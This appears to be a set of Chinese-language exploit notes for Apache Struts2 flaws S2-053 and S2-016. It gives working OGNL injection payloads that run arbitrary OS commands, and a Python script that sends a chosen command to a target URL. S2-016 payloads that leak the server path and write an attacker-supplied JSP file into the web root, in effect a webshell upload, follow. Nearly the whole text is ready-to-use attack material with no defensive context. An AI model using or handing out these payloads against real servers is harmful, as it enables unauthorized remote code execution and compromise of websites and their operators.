Struts2

Struts2_053

POC:

%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27whoami%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew+java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='calc').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new+java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

对上述poc进行URI编码，但是对（'.'，'+'，'_'，'-'）不进行URI编码

python脚本：

#coding:utf-8

from requests import *
from sys import argv



def Uage():
    print '''[+]python Struts2_053.py [URL]'''

def Exec_cmd(url):
    full_url = url+"?name="+POC
    result = get(full_url).content
    print result.decode('utf-8').encode('GBK')


if __name__ == "__main__":
    try:    
        url = argv[1]
        cmd = raw_input("cmd> ")
        print type(cmd)
        POC = "%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27%s%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew+java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D".replace('%s',cmd)
        Exec_cmd(url)
    except:
        Uage()

 struts2-016

POC

s2 016：
爆网站路径POC：
    ?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

执行任意命令：
    ?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b,'GBK'),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[5000],%23d.read(%23e),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23req.setContentType('text/html;charset%3dGBK'),%23req.getWriter().println(%23e),%23req.getWriter().println('--EOF--'),%23req.getWriter().flush(),%23req.getWriter().close()}

上传文件：
    ?redirect:${%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23p%3d%23req.getRealPath(%22/%22)%2b%22readme.jsp%22,%23res.getWriter().println('Upload completed!File path:['%2b%23p%2b']'),%23res.getWriter().flush(),%23res.getWriter().close(),new%20java.io.FileOutputStream(%23p).write(%23req.getParameter(%22c%22).getBytes()).close()}&c=

 注意：如果爆路径爆出的是根目录或其他有可能是错的目录，这时可以使用

ps aux   #aux 显示所有包含其他使用者的行程 

在执行命令过程中，启用tomcat服务时会用到该网站目录的内容，可以从中得取（LINUX）